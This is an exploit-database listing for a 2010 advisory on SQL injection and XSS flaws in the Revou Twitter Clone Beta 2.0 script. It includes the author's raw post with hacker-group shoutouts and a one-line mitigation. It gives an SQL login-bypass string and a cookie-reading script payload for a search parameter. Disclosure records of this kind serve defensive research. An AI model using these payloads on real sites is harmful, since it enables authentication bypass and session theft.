header-logo
Suggest Exploit
vendor:
Revou Twitter Clone Beta 2.0
by:
Sid3^effects
8,8
CVSS
HIGH
SQL Injection and XSS
89, 79
CWE
Product Name: Revou Twitter Clone Beta 2.0
Affected Version From: 2.0
Affected Version To: 2.0
Patch Exists: NO
Related CWE: N/A
CPE: a:revou:revou_twitter_clone_beta_2.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

reVou twitter clne Beta 2.0 sqli and Xss vulnerability

Existing site owners can benefit from running a micro blogging service resulting in more viral growth for your website when your users interact with follow friends by receiving updates via our social network platform. With our SMS integration as well as custom API, we allow you to gain more revenues through purchase of SMS credits, revenues from web advertisements and as well benefiting from 3rd party applications built for your site using our API. To exploit the vulnerability, attackers can use ' or 1=1 or ''=' to login and <script>alert(document.cookie)</script> for XSS.

Mitigation:

Implement input validation and output encoding to prevent SQL injection and XSS attacks.
Source

Exploit-DB raw data:

# Title:reVou twitter clne Beta 2.0 sqli and Xss vulnerability
# Author: Sid3^effects
# Published: 2010-06-06
# price:$99
# email:shell_c99@yahoo.com
# vendor: Revou
# url : http://www.revou.com/demo/home

############################################################################
        ooooo  .oooooo.  oooooo   oooooo     oooo 
        `888' d8P'  `Y8b  `888.    `888.     .8' 
         888 888           `888.   .8888.   .8' 
         888 888            `888  .8'`888. .8' 
         888 888             `888.8'  `888.8'  
         888 `88b    ooo      `888'    `888' 
        o888o `Y8bood8P'       `8'      `8'    
                                          
-------------------------------------------------------------------------------------- 
#####################Sid3^effects aKa HaRi################################## 
#Greetz to all Andhra Hackers and ICW Memebers[Indian Cyber Warriors] 
#Thanks:*L0rd ÇrusAdêr*,d4rk-blu™®,R45C4L,CR4C|< 008,M4n0j,MaYuR 
#ShouTZ:kedar,dec0d3r,41.w4r10r
#spl shoutz:LiquidWorm,gunslinger_ :D      
#Catch us at www.andhrahackers.com or www.teamicw.in 
############################################################################ 
Description :
Existing site owners can benefit from running a micro blogging service resulting in more viral growth for your website when your users interact with follow
friends by receiving updates via our social network platform. With our SMS integration as well as custom API, we allow you to gain more revenues through
purchase of SMS credits, revenues from web advertisements and as well benefiting from 3rd party applications built for your site using our API.
 
ReVou Micro Blogging social networking script can use for any industries ranging from real estate, cooperate events, hobbyist websites or any social
networking sites which you can create a platform for your users to get updates or interact with each other.
 
############################################################################ 
Xploit : sqli vulnerability.

use ' or 1=1 or ''=' to login
Demo Url : http://server/path/
############################################################################
Xploit : xss  vulnerability
 Parameter Name: search friends or groups
 Parameter Type: Querystring  
 Attack Pattern: '"-->
         
############################################################################ 
#spl thks: exploit-db.com
#Sid3^effects

Navigation

Suggest Exploit

Services By CQR